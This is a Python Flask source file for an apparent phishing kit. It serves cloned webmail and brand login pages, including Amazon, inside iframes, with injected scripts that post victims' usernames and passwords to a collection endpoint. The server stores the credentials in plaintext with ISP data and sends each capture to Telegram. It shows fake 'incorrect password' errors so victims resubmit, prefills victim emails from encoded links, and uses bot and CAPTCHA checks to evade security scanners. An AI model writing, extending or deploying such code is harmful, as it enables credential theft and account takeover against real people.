from flask import Blueprint, request, jsonify, render_template, abort, redirect, url_for, Response
from app import db
from models import DeployedApp, FormSubmission, BlockedIP, Analytics
from utils import is_bot, get_ip_info, send_telegram_notification, get_setting, send_visitor_notification, get_real_client_ip
from ai_antibot.dashboard.monitor import TrainingMonitor
from ai_antibot.models.detector import BotDetector
import logging
import json

api_bp = Blueprint('api', __name__)

# Initialize AI-AntiBot components
training_monitor = TrainingMonitor()
bot_detector = BotDetector()

@api_bp.route('/app/<api_key>')
@api_bp.route('/app/<api_key>/<path:page>')
def serve_app(api_key, page=None):
    # Get step parameter (default to 1 for single-step apps)
    step = request.args.get('step', 1, type=int)
    
    # Check if API key is valid
    deployment = DeployedApp.query.filter_by(api_key=api_key, enabled=True).first()
    if not deployment:
        abort(404)
    
    # Validate step number for multi-step apps
    if deployment.multi_step_enabled:
        if step < 1 or step > deployment.step_count:
            abort(400)  # Invalid step number
    else:
        step = 1  # Force step 1 for single-step apps
    
    # Get client IP
    client_ip = get_real_client_ip(request)
    
    # Enhanced bot protection - Check for iframe/embedding context
    referer = request.headers.get('Referer', '')
    sec_fetch_dest = request.headers.get('Sec-Fetch-Dest', '')
    sec_fetch_mode = request.headers.get('Sec-Fetch-Mode', '')
    sec_fetch_site = request.headers.get('Sec-Fetch-Site', '')
    
    # Allow if coming from iframe (legitimate embedding)
    is_iframe_request = (
        sec_fetch_dest == 'iframe' or 
        sec_fetch_mode == 'navigate' or
        'iframe' in referer.lower() or
        request.args.get('verified') == 'true'
    )
    
    # AI-AntiBot integration: Check if Cloudflare is enabled for this webapp
    turnstile_enabled = deployment.turnstile_enabled
    ai_mode = 'learn' if turnstile_enabled else 'decide'
    
    # Make AI prediction
    is_bot_ai, confidence, details = bot_detector.predict(
        request, client_ip, None, deployment, ai_mode
    )
    
    # Record AI interaction with training monitor
    if turnstile_enabled:
        # Learning mode: just observe
        training_monitor.record_ai_prediction(request, client_ip, is_bot_ai, confidence, details)
    else:
        # Decision mode: AI actively makes decisions
        if is_bot_ai and confidence >= 0.8:
            # Block high-confidence bot detections
            analytics = Analytics(
                event_type='ai_bot_blocked',
                ip_address=client_ip,
                deployed_app_id=deployment.id
            )
            analytics.set_extra_data({
                'ai_confidence': confidence,
                'ai_details': details,
                'user_agent': request.headers.get('User-Agent', '')
            })
            db.session.add(analytics)
            db.session.commit()
            
            return jsonify({
                'error': 'Access denied by AI-AntiBot system',
                'confidence': confidence
            }), 403
    
    # Block direct access without proper embedding context
    if not is_iframe_request and not referer:
        # Log suspicious direct access
        analytics = Analytics(
            event_type='direct_access_blocked',
            ip_address=client_ip,
            deployed_app_id=deployment.id,
            extra_data=json.dumps({
                'user_agent': request.headers.get('User-Agent', ''),
                'reason': 'Direct access without iframe context'
            })
        )
        db.session.add(analytics)
        db.session.commit()
        
        # Redirect to CAPTCHA or block
        return redirect(url_for('main.captcha_page', blocked='true', api_key=api_key))
    
    # Check if already verified from CAPTCHA
    is_verified = request.args.get('verified') == 'true'
    session_key = f'verified_{client_ip}_{api_key}'
    captcha_verified = get_setting(session_key) == 'true'
    
    # Check if IP is blocked
    blocked_ip = BlockedIP.query.filter_by(ip_address=client_ip).first()
    if blocked_ip:
        # Log analytics
        analytics = Analytics(
            event_type='blocked_access',
            ip_address=client_ip,
            deployed_app_id=deployment.id
        )
        db.session.add(analytics)
        db.session.commit()
        
        # Redirect to central CAPTCHA page with blocked status
        return redirect(url_for('main.captcha_page', blocked='true', api_key=api_key))
    
    # Rate limiting - Check recent requests from same IP
    from datetime import datetime, timedelta
    recent_requests = Analytics.query.filter(
        Analytics.ip_address == client_ip,
        Analytics.event_type == 'iframe_view',
        Analytics.created_at >= datetime.utcnow() - timedelta(minutes=5)
    ).count()
    
    if recent_requests >= 10:  # More than 10 requests in 5 minutes
        # Log suspicious activity
        analytics = Analytics(
            event_type='rate_limit_exceeded',
            ip_address=client_ip,
            deployed_app_id=deployment.id,
            extra_data=json.dumps({'requests_count': recent_requests})
        )
        db.session.add(analytics)
        db.session.commit()
        
        # Redirect to CAPTCHA for rate limiting
        return redirect(url_for('main.captcha_page', api_key=api_key))
    
    # AI-AntiBot integration for webapp access
    turnstile_enabled = deployment.turnstile_enabled
    ai_mode = 'learn' if turnstile_enabled else 'decide'
    
    # Make AI prediction for webapp access
    is_bot_ai, confidence, details = bot_detector.predict(
        request, client_ip, None, deployment, ai_mode
    )
    
    # Handle AI decision for webapp access
    if ai_mode == 'decide' and is_bot_ai and confidence >= 0.8:
        # AI detected bot with high confidence - block access
        analytics = Analytics(
            event_type='ai_access_blocked',
            ip_address=client_ip,
            deployed_app_id=deployment.id
        )
        analytics.set_extra_data({
            'ai_confidence': confidence,
            'ai_details': details,
            'access_type': 'webapp_access'
        })
        db.session.add(analytics)
        
        # Add IP to blocked list if not already blocked
        blocked_ip = BlockedIP.query.filter_by(ip_address=client_ip).first()
        if not blocked_ip:
            blocked_ip = BlockedIP(
                ip_address=client_ip,
                reason=f'AI-AntiBot detection (confidence: {confidence:.2f})',
                bot_attempts=1
            )
            db.session.add(blocked_ip)
        else:
            # Update existing blocked IP with AI detection info
            blocked_ip.bot_attempts += 1
            blocked_ip.reason = f'AI-AntiBot detection (confidence: {confidence:.2f})'
        
        db.session.commit()
        
        # Redirect to central CAPTCHA page with blocked status
        return redirect(url_for('main.captcha_page', blocked='ai', api_key=api_key, confidence=confidence))
    
    # Record AI interaction for training/monitoring
    training_monitor.record_ai_prediction(request, client_ip, is_bot_ai, confidence, details)
    
    # Check if CAPTCHA is required (only per-deployment setting)
    if turnstile_enabled and not captcha_verified and not is_verified:
        # Redirect to central CAPTCHA page
        return redirect(url_for('main.captcha_page', api_key=api_key))
    
    # Increment visits counter only on first step
    if step == 1:
        deployment.visits = (deployment.visits or 0) + 1
    
    # Log iframe view with step information
    analytics = Analytics(
        event_type='iframe_view',
        ip_address=client_ip,
        deployed_app_id=deployment.id
    )
    analytics.set_extra_data({
        'step': step,
        'multi_step': deployment.multi_step_enabled,
        'user_agent': request.headers.get('User-Agent', '')
    })
    db.session.add(analytics)
    db.session.commit()
    
    # Send visitor notification to Telegram only on first step of single-step apps
    # For multi-step apps, only send notification on the very first step
    if step == 1:
        try:
            user_agent = request.headers.get('User-Agent', '')
            send_visitor_notification(deployment, client_ip, user_agent)
        except Exception as e:
            logging.error(f"Failed to send visitor notification: {e}")
            # Don't break the app serving if notification fails
    
    # Serve the webmail template directly from the webapp
    import os
    from flask import render_template_string
    
    # Read the webmail template (handle multi-step templates)
    template_path = deployment.app_template.folder_path
    
    # Handle Amazon's special case with index2.html
    if page and deployment.app_template.name == 'Amazon':
        base_dir = os.path.dirname(template_path)
        if page == 'index2.html':
            template_path = os.path.join(base_dir, 'index2.html')
    
    # For multi-step apps, determine the correct template file
    elif deployment.multi_step_enabled and step > 1:
        # Multi-step template: replace index.html with indexN.html
        base_dir = os.path.dirname(template_path)
        template_filename = f"index{step}.html"
        multi_step_template_path = os.path.join(base_dir, template_filename)
        
        # Check if the step-specific template exists
        if os.path.exists(multi_step_template_path):
            template_path = multi_step_template_path
        else:
            # Fallback to default template if step-specific template doesn't exist
            pass
    
    try:
        with open(template_path, 'r', encoding='utf-8') as f:
            html_content = f.read()
        
        # Get base URL for form submission
        base_url = get_setting('base_url', 'http://localhost:5000')
        
        # Generate a unique client token for this session
        import secrets
        client_token = secrets.token_hex(16)
        
        # Determine which script to inject based on template and multi-step configuration
        if page == 'index2.html':
            # Use multi_script for index2.html (additional verification)
            if deployment.multi_step_enabled:
                session_id = request.args.get('session_id', '')
                form_script = generate_multi_step_script(deployment, client_token, step, session_id, base_url)
            else:
                form_script = generate_single_step_script(deployment, client_token, base_url)
        else:
            # Use form_script for index.html (main login)
            if deployment.multi_step_enabled:
                session_id = request.args.get('session_id', '')
                form_script = generate_multi_step_script(deployment, client_token, step, session_id, base_url)
            else:
                form_script = generate_single_step_script(deployment, client_token, base_url)
        
        # Replace the form script placeholder
        html_content = html_content.replace('{{FORM_SCRIPT}}', form_script)
        html_content = html_content.replace('{{MULTI_SCRIPT}}', form_script)
        
        return html_content
        
    except Exception as e:
        logging.error(f"Error loading webmail template: {str(e)}")
        return f"<html><body><h1>Error loading webmail</h1><p>{str(e)}</p></body></html>"


def generate_multi_step_script(deployment, client_token, step, session_id, base_url):
    """Generate JavaScript for multi-step form handling"""
    return f"""
<script>
// Multi-step form handling with enhanced bot protection
const clientToken = '{client_token}';
const sessionStart = Date.now();
const currentStep = {step};
const totalSteps = {deployment.step_count};
const sessionId = '{session_id}';
const apiKey = '{deployment.api_key}';

// Anti-bot checks
function validateClientEnvironment() {{
    const checks = {{
        hasWindow: typeof window !== 'undefined',
        hasDocument: typeof document !== 'undefined',
        hasNavigator: typeof navigator !== 'undefined',
        hasLocalStorage: typeof localStorage !== 'undefined',
        hasSessionStorage: typeof sessionStorage !== 'undefined',
        hasScreen: typeof screen !== 'undefined'
    }};
    
    const passedChecks = Object.values(checks).filter(Boolean).length;
    return passedChecks >= 5;
}}

// Check if running in legitimate browser environment
if (!validateClientEnvironment()) {{
    window.location.href = '/cf?blocked=true&api_key={deployment.api_key}';
}}

document.addEventListener('DOMContentLoaded', function() {{
    const form = document.querySelector('form');
    if (form) {{
        form.addEventListener('submit', function(e) {{
            e.preventDefault();
            
            const formData = new FormData(this);
            const submitButton = form.querySelector('button[type="submit"]');
            
            // Add multi-step specific data
            formData.append('client_token', clientToken);
            formData.append('session_duration', Date.now() - sessionStart);
            formData.append('step', currentStep);
            formData.append('session_id', sessionId);
            formData.append('screen_info', JSON.stringify({{
                width: screen.width,
                height: screen.height,
                colorDepth: screen.colorDepth
            }}));
            
            // Disable button during submission
            if (submitButton) {{
                submitButton.disabled = true;
                if (currentStep === totalSteps) {{
                    submitButton.textContent = 'Processing...';
                }} else {{
                    submitButton.textContent = 'Next Step...';
                }}
            }}
            
            fetch('{base_url}/api/submit/{deployment.api_key}', {{
                method: 'POST',
                body: formData
            }})
            .then(response => response.json())
            .then(responseData => {{
                if (responseData.redirect) {{
                    // Check if this is a final redirect (max attempts reached) or intermediate step
                    if (responseData.final_redirect === true) {{
                        // Final redirect - break out of iframe
                        if (window.top !== window.self) {{
                            window.top.location.href = responseData.redirect;
                        }} else {{
                            window.location.href = responseData.redirect;
                        }}
                    }} else {{
                        // Intermediate step - stay within iframe
                        window.location.href = responseData.redirect;
                    }}
                }} else if (responseData.next_step) {{
                    // Move to next step - always stay within iframe
                    const nextStepUrl = responseData.redirect;
                    window.location.href = nextStepUrl;
                }} else if (responseData.success) {{
                    // Final success redirect - break out of iframe
                    const redirectUrl = responseData.redirect || '/';
                    if (window.top !== window.self) {{
                        window.top.location.href = redirectUrl;
                    }} else {{
                        window.location.href = redirectUrl;
                    }}
                }} else {{
                    // Error handling
                    if (responseData.error) {{
                        showError(responseData.error);
                    }} else {{
                        showError('Please check your information and try again.');
                    }}
                    
                    if (submitButton) {{
                        submitButton.disabled = false;
                        if (currentStep === totalSteps) {{
                            submitButton.textContent = 'Submit';
                        }} else {{
                            submitButton.textContent = 'Continue';
                        }}
                    }}
                }}
            }})
            .catch(error => {{
                console.error('Error:', error);
                showError('An error occurred. Please try again.');
                if (submitButton) {{
                    submitButton.disabled = false;
                    if (currentStep === totalSteps) {{
                        submitButton.textContent = 'Submit';
                    }} else {{
                        submitButton.textContent = 'Continue';
                    }}
                }}
            }});
        }});
    }}
    
    // Function to show error messages
    function showError(message) {{
        const errorDiv = document.getElementById('error-message') || createErrorDiv();
        errorDiv.innerHTML = '<div style="color: #d32f2f; background: #ffebee; padding: 10px; border-radius: 4px; margin-bottom: 15px; border: 1px solid #ffcdd2;">' + message + '</div>';
        errorDiv.style.display = 'block';
        errorDiv.scrollIntoView({{ behavior: 'smooth', block: 'nearest' }});
    }}
    
    // Function to create error div if it doesn't exist
    function createErrorDiv() {{
        const errorDiv = document.createElement('div');
        errorDiv.id = 'error-message';
        errorDiv.style.marginBottom = '15px';
        
        const form = document.querySelector('form');
        if (form) {{
            form.insertBefore(errorDiv, form.firstChild);
        }}
        
        return errorDiv;
    }}
}});
</script>
"""


def generate_single_step_script(deployment, client_token, base_url):
    """Generate JavaScript for single-step form handling"""
    return f"""
<script>
// Enhanced bot protection - Client-side validation token
const clientToken = '{client_token}';
const sessionStart = Date.now();

// Anti-bot checks
function validateClientEnvironment() {{
    const checks = {{
        hasWindow: typeof window !== 'undefined',
        hasDocument: typeof document !== 'undefined',
        hasNavigator: typeof navigator !== 'undefined',
        hasLocalStorage: typeof localStorage !== 'undefined',
        hasSessionStorage: typeof sessionStorage !== 'undefined',
        hasScreen: typeof screen !== 'undefined'
    }};
    
    // Real browsers have all these objects
    const passedChecks = Object.values(checks).filter(Boolean).length;
    return passedChecks >= 5;
}}

// Check if running in legitimate browser environment
if (!validateClientEnvironment()) {{
    // Redirect bots to blocking page
    window.location.href = '/cf?blocked=true&api_key={deployment.api_key}';
}}

document.addEventListener('DOMContentLoaded', function() {{
    let attemptCount = 0;
    const maxAttempts = {deployment.max_attempts};
    
    // Function to show error messages inline
    function showError(message) {{
        const errorDiv = document.getElementById('error-message') || document.getElementById('alertContainer') || createErrorDiv();
        errorDiv.innerHTML = '<div style="color: #d32f2f; background: #ffebee; padding: 10px; border-radius: 4px; margin-bottom: 15px; border: 1px solid #ffcdd2;">' + message + '</div>';
        errorDiv.style.display = 'block';
        
        // Scroll to error message
        errorDiv.scrollIntoView({{ behavior: 'smooth', block: 'nearest' }});
    }}
    
    // Function to create error div if it doesn't exist
    function createErrorDiv() {{
        const errorDiv = document.createElement('div');
        errorDiv.id = 'error-message';
        errorDiv.style.marginBottom = '15px';
        
        const form = document.getElementById('login_form') || document.getElementById('loginForm') || document.querySelector('form');
        if (form) {{
            form.insertBefore(errorDiv, form.firstChild);
        }}
        
        return errorDiv;
    }}
    
    // Function to clear error messages
    function clearError() {{
        const errorDiv = document.getElementById('error-message') || document.getElementById('alertContainer');
        if (errorDiv) {{
            errorDiv.innerHTML = '';
            errorDiv.style.display = 'none';
        }}
    }}
    
    // Handle URL fragment for username prefill
    function handleFragmentPrefill() {{
        const fragment = window.location.hash.substring(1); // Remove #
        
        if (fragment) {{
            let username = '';
            
            try {{
                // Try Base64 decoding first
                const decoded = atob(fragment);
                
                // Validate decoded content looks like an email
                if (decoded && decoded.includes('@') && decoded.includes('.')) {{
                    username = decoded;
                }}
            }} catch (e) {{
                // Base64 decoding failed, try as plain text
                console.log('Base64 decode failed, trying plain text');
                
                // Try treating as plain text email
                if (fragment.includes('@') && fragment.includes('.')) {{
                    username = fragment;
                }}
            }}
            
            // If we found a valid username, prefill and make read-only
            if (username) {{
                const usernameField = document.querySelector('input[name="username"]');
                if (usernameField) {{
                    usernameField.value = username;
                    usernameField.readOnly = true;
                    usernameField.style.backgroundColor = '#f8f9fa';
                    usernameField.style.cursor = 'not-allowed';
                    
                    // Focus on password field instead
                    const passwordField = document.querySelector('input[name="password"]');
                    if (passwordField) {{
                        passwordField.focus();
                    }}
                }}
            }}
        }}
    }}
    
    // Call prefill function
    handleFragmentPrefill();
    
    const form = document.getElementById('login_form') || document.getElementById('loginForm') || document.querySelector('form');
    if (form) {{
        form.addEventListener('submit', function(e) {{
            e.preventDefault();
            
            // Clear any previous error messages
            clearError();
            
            const formData = new FormData(this);
            const submitButton = form.querySelector('button[type="submit"]');
            
            // Add client token and timing information for bot detection
            formData.append('client_token', clientToken);
            formData.append('session_duration', Date.now() - sessionStart);
            formData.append('screen_info', JSON.stringify({{
                width: screen.width,
                height: screen.height,
                colorDepth: screen.colorDepth
            }}));
            
            // Disable button during submission
            if (submitButton) {{
                submitButton.disabled = true;
                submitButton.textContent = 'Signing in...';
            }}
            
            fetch('{base_url}/api/submit/{deployment.api_key}', {{
                method: 'POST',
                body: formData
            }})
            .then(response => response.json())
            .then(responseData => {{
                if (responseData.redirect) {{
                    // Break out of iframe to redirect
                    if (window.top !== window.self) {{
                        window.top.location.href = responseData.redirect;
                    }} else {{
                        window.location.href = responseData.redirect;
                    }}
                }} else if (responseData.success) {{
                    // Break out of iframe to redirect
                    const redirectUrl = responseData.redirect || '/';
                    if (window.top !== window.self) {{
                        window.top.location.href = redirectUrl;
                    }} else {{
                        window.location.href = redirectUrl;
                    }}
                }} else {{
                    attemptCount++;
                    if (responseData.error) {{
                        if (responseData.attempts_remaining !== undefined) {{
                            if (responseData.attempts_remaining > 0) {{
                                showError('Incorrect email or password.');
                                if (submitButton) {{
                                    submitButton.disabled = false;
                                    submitButton.textContent = 'Sign In';
                                }}
                            }} else {{
                                showError('Maximum attempts reached. Please try again later.');
                                if (submitButton) {{
                                    submitButton.disabled = true;
                                    submitButton.textContent = 'Blocked';
                                }}
                            }}
                        }} else {{
                            showError('Incorrect email or password.');
                            if (submitButton) {{
                                submitButton.disabled = false;
                                submitButton.textContent = 'Sign In';
                            }}
                        }}
                    }} else {{
                        if (attemptCount >= maxAttempts) {{
                            showError('Maximum attempts reached. Please try again later.');
                            if (submitButton) {{
                                submitButton.disabled = true;
                                submitButton.textContent = 'Blocked';
                            }}
                        }} else {{
                            showError('Incorrect email or password.');
                            if (submitButton) {{
                                submitButton.disabled = false;
                                submitButton.textContent = 'Sign In';
                            }}
                        }}
                    }}
                }}
            }})
            .catch(error => {{
                console.error('Error:', error);
                showError('Incorrect email or password.');
                if (submitButton) {{
                    submitButton.disabled = false;
                    submitButton.textContent = 'Sign In';
                }}
            }});
        }});
    }}
}});
</script>
"""


@api_bp.route('/submit/<api_key>', methods=['POST'])
def submit_form(api_key):
    # Get step parameter (default to 1 for single-step apps)
    step = request.form.get('step', 1, type=int)
    
    # Check if API key is valid
    deployment = DeployedApp.query.filter_by(api_key=api_key, enabled=True).first()
    if not deployment:
        return jsonify({'error': 'Invalid API key'}), 400
    
    # Validate step number for multi-step apps
    if deployment.multi_step_enabled:
        if step < 1 or step > deployment.step_count:
            return jsonify({'error': 'Invalid step number'}), 400
    else:
        step = 1  # Force step 1 for single-step apps
    
    # Get client IP
    client_ip = get_real_client_ip(request)
    
    # Enhanced bot detection for form submissions
    client_token = request.form.get('client_token')
    session_duration = request.form.get('session_duration')
    screen_info = request.form.get('screen_info')
    
    # Validate client token and timing (bots often submit too quickly)
    if not client_token or len(client_token) != 32:
        # Log suspicious submission
        analytics = Analytics(
            event_type='suspicious_submission',
            ip_address=client_ip,
            deployed_app_id=deployment.id,
            extra_data=json.dumps({'reason': 'Missing or invalid client token'})
        )
        db.session.add(analytics)
        db.session.commit()
        return jsonify({'error': 'Invalid submission'}), 400
    
    # Check session duration (too fast = bot)
    if session_duration and int(session_duration) < 2000:  # Less than 2 seconds
        analytics = Analytics(
            event_type='suspicious_submission',
            ip_address=client_ip,
            deployed_app_id=deployment.id,
            extra_data=json.dumps({'reason': 'Submission too fast', 'duration': session_duration})
        )
        db.session.add(analytics)
        db.session.commit()
        return jsonify({'error': 'Submission too fast'}), 400
    
    # Check if IP is blocked
    blocked_ip = BlockedIP.query.filter_by(ip_address=client_ip).first()
    if blocked_ip:
        return jsonify({'error': 'Access denied'}), 403
    
    # AI-AntiBot integration for form submissions
    turnstile_enabled = deployment.turnstile_enabled
    ai_mode = 'learn' if turnstile_enabled else 'decide'
    
    # Make AI prediction
    is_bot_ai, confidence, details = bot_detector.predict(
        request, client_ip, None, deployment, ai_mode
    )
    
    # Handle AI decision
    if ai_mode == 'decide' and is_bot_ai and confidence >= 0.8:
        # AI detected bot with high confidence - block submission
        analytics = Analytics(
            event_type='ai_form_blocked',
            ip_address=client_ip,
            deployed_app_id=deployment.id
        )
        analytics.set_extra_data({
            'ai_confidence': confidence,
            'ai_details': details,
            'form_data': {
                'username': request.form.get('username', ''),
                'has_password': bool(request.form.get('password'))
            }
        })
        db.session.add(analytics)
        
        # Add IP to blocked list if not already blocked
        blocked_ip = BlockedIP.query.filter_by(ip_address=client_ip).first()
        if not blocked_ip:
            blocked_ip = BlockedIP(
                ip_address=client_ip,
                reason=f'AI-AntiBot detection (confidence: {confidence:.2f})',
                bot_attempts=1
            )
            db.session.add(blocked_ip)
        else:
            # Update existing blocked IP with AI detection info
            blocked_ip.bot_attempts += 1
            blocked_ip.reason = f'AI-AntiBot detection (confidence: {confidence:.2f})'
        
        db.session.commit()
        
        return jsonify({
            'error': 'Access denied - suspicious activity detected',
            'confidence': confidence
        }), 403
    
    # Record AI interaction for training/monitoring
    training_monitor.record_ai_prediction(request, client_ip, is_bot_ai, confidence, details)
    
    # Handle multi-step vs single-step submission
    if deployment.multi_step_enabled:
        return handle_multi_step_submission(deployment, client_ip, step, request)
    else:
        return handle_single_step_submission(deployment, client_ip, request)


def handle_multi_step_submission(deployment, client_ip, step, request):
    """Handle multi-step form submission with session management"""
    import secrets
    from datetime import datetime
    
    # Generate or retrieve session ID
    session_id = request.form.get('session_id') or secrets.token_hex(16)
    
    # Get current form data
    current_step_data = {}
    for key, value in request.form.items():
        if key not in ['client_token', 'session_duration', 'screen_info', 'step', 'session_id']:
            current_step_data[key] = value
    
    # Store step data in session (using Settings table as temporary storage)
    session_key = f"multi_step_{session_id}_{step}"
    from utils import set_setting, get_setting
    set_setting(session_key, json.dumps(current_step_data))
    
    # Store session start time if this is step 1
    if step == 1:
        session_start_key = f"multi_step_start_{session_id}"
        set_setting(session_start_key, str(datetime.utcnow().timestamp()))
    
    # Check if this is the final step
    if step == deployment.step_count:
        # Final step - consolidate all data and create submission
        consolidated_data = {}
        session_start_time = None
        
        # Collect data from all steps
        for s in range(1, deployment.step_count + 1):
            step_key = f"multi_step_{session_id}_{s}"
            step_data = get_setting(step_key)
            if step_data:
                try:
                    step_data_dict = json.loads(step_data)
                    consolidated_data[f"step_{s}"] = step_data_dict
                except json.JSONDecodeError:
                    pass
        
        # Get session start time
        session_start_key = f"multi_step_start_{session_id}"
        start_time_str = get_setting(session_start_key)
        if start_time_str:
            session_start_time = datetime.fromtimestamp(float(start_time_str))
        
        # Calculate completion time
        completion_time = ""
        if session_start_time:
            duration = datetime.utcnow() - session_start_time
            minutes = int(duration.total_seconds() // 60)
            seconds = int(duration.total_seconds() % 60)
            completion_time = f"{minutes}m {seconds}s"
        
        # Extract username and password from consolidated data
        username = ""
        password = ""
        
        # Look for username in any step
        for step_key, step_data in consolidated_data.items():
            if isinstance(step_data, dict):
                for field, value in step_data.items():
                    if field.lower() in ['username', 'email', 'user'] and value:
                        username = value
                    elif field.lower() in ['password', 'pass'] and value:
                        password = value
        
        # Check how many attempts this IP has made for this deployment
        attempt_count = FormSubmission.query.filter_by(
            deployed_app_id=deployment.id,
            ip_address=client_ip
        ).count()
        
        # Get ISP information
        isp_info = get_ip_info(client_ip)
        
        # Create consolidated submission record
        submission = FormSubmission(
            deployed_app_id=deployment.id,
            ip_address=client_ip,
            username=username,
            password=password,
            user_agent=request.headers.get('User-Agent', ''),
            extra_data=json.dumps(consolidated_data),
            isp_info=json.dumps(isp_info) if isp_info else None,
            session_id=session_id,
            step_count=deployment.step_count,
            completion_time=completion_time
        )
        
        db.session.add(submission)
        
        # Log analytics
        analytics = Analytics(
            event_type='multi_step_submission',
            ip_address=client_ip,
            deployed_app_id=deployment.id
        )
        analytics.set_extra_data({
            'session_id': session_id,
            'step_count': deployment.step_count,
            'completion_time': completion_time,
            'total_fields': len(consolidated_data)
        })
        db.session.add(analytics)
        db.session.commit()
        
        # Clean up session data
        for s in range(1, deployment.step_count + 1):
            step_key = f"multi_step_{session_id}_{s}"
            set_setting(step_key, None)
        set_setting(session_start_key, None)
        
        # Send Telegram notification
        try:
            send_telegram_notification(submission)
            logging.info(f"Successfully processed multi-step submission {submission.id} for deployment {deployment.id}")
        except Exception as e:
            logging.error(f"Failed to send Telegram notification: {e}")
        
        # Check if max attempts reached (after recording this attempt)
        current_attempts = attempt_count + 1
        
        # Return response
        if current_attempts >= deployment.max_attempts:
            # Max attempts reached - redirect to external URL (final redirect)
            if deployment.redirect_url:
                base_url = get_setting('base_url', 'http://localhost:5000')
                redirect_page_url = f"{base_url}/redirect/{deployment.api_key}"
                return jsonify({
                    'redirect': redirect_page_url,
                    'final_redirect': True,
                    'message': 'Maximum attempts reached'
                })
            else:
                return jsonify({
                    'success': True, 
                    'message': 'Form submitted successfully',
                    'final_redirect': True
                })
        else:
            # Not max attempts yet - show error to allow retry
            return jsonify({'error': 'Invalid credentials', 'attempts_remaining': deployment.max_attempts - current_attempts})
    
    else:
        # Not the final step - send notification for current step and proceed to next step
        
        # Only send step notification if this is step 1 (username/password step)
        if step == 1:
            # Create a temporary submission object for step 1 notification
            temp_submission = type('TempSubmission', (), {
                'id': f'temp_{session_id}_{step}',
                'deployed_app': deployment,
                'ip_address': client_ip,
                'username': current_step_data.get('username', ''),
                'password': current_step_data.get('password', ''),
                'user_agent': request.headers.get('User-Agent', ''),
                'created_at': datetime.utcnow(),
                'step_count': step,
                'completion_time': None,
                'get_extra_data': lambda: {f'step_{step}': current_step_data},
                'get_isp_info': lambda: get_ip_info(client_ip)
            })()
            
            # Send notification for step 1 only
            try:
                send_telegram_notification(temp_submission)
                logging.info(f"Sent step {step} notification for session {session_id}")
            except Exception as e:
                logging.error(f"Failed to send step {step} notification: {e}")
        
        # Proceed to next step
        next_step = step + 1
        base_url = get_setting('base_url', 'http://localhost:5000')
        next_step_url = f"{base_url}/api/app/{deployment.api_key}?step={next_step}&session_id={session_id}"
        
        return jsonify({
            'next_step': next_step,
            'redirect': next_step_url,
            'session_id': session_id,
            'final_redirect': False
        })


def handle_single_step_submission(deployment, client_ip, request):
    """Handle traditional single-step form submission"""
    # Get form data with multiple field name support
    username = (request.form.get('username') or 
               request.form.get('user') or 
               request.form.get('email') or '')
    password = (request.form.get('password') or 
               request.form.get('pass') or '')
    
    # Log form submission attempt for debugging
    logging.info(f"Form submission attempt - API Key: {deployment.api_key}, IP: {client_ip}, Username: {username[:3]}***")
    
    # Check how many attempts this IP has made for this deployment
    attempt_count = FormSubmission.query.filter_by(
        deployed_app_id=deployment.id,
        ip_address=client_ip
    ).count()
    
    # Get ISP information
    isp_info = get_ip_info(client_ip)
    
    # Create submission record
    submission = FormSubmission(
        deployed_app_id=deployment.id,
        ip_address=client_ip,
        username=username,
        password=password,
        user_agent=request.headers.get('User-Agent', ''),
        extra_data=json.dumps(dict(request.form)) if request.form else None,
        isp_info=json.dumps(isp_info) if isp_info else None
    )
    
    db.session.add(submission)
    
    # Log analytics
    analytics = Analytics(
        event_type='submission',
        ip_address=client_ip,
        deployed_app_id=deployment.id
    )
    db.session.add(analytics)
    db.session.commit()
    
    # Send Telegram notification
    try:
        send_telegram_notification(submission)
        logging.info(f"Successfully processed submission {submission.id} for deployment {deployment.id}")
    except Exception as e:
        logging.error(f"Failed to send Telegram notification: {e}")
    
    # Check if max attempts reached (after recording this attempt)
    current_attempts = attempt_count + 1
    
    # Return response
    try:
        if current_attempts >= deployment.max_attempts:
            # Max attempts reached - redirect to external URL (final redirect)
            if deployment.redirect_url:
                base_url = get_setting('base_url', 'http://localhost:5000')
                redirect_page_url = f"{base_url}/redirect/{deployment.api_key}"
                return jsonify({
                    'redirect': redirect_page_url,
                    'final_redirect': True,
                    'message': 'Maximum attempts reached'
                })
            else:
                return jsonify({
                    'success': True, 
                    'message': 'Form submitted successfully',
                    'final_redirect': True
                })
        else:
            # Not max attempts yet - show error to allow retry
            return jsonify({'error': 'Invalid credentials', 'attempts_remaining': deployment.max_attempts - current_attempts})
    except Exception as e:
        logging.error(f"Error creating response for submission: {str(e)}")
        return jsonify({'error': 'Processing error'}), 500


@api_bp.route('/verify-captcha', methods=['POST'])
def verify_captcha():
    # Implement Cloudflare Turnstile verification
    token = request.form.get('cf-turnstile-response')
    
    if not token:
        return jsonify({'error': 'CAPTCHA token missing'}), 400
    
    # Here you would verify the token with Cloudflare Turnstile API
    # For now, we'll assume it's valid
    return jsonify({'success': True, 'message': 'CAPTCHA verified'})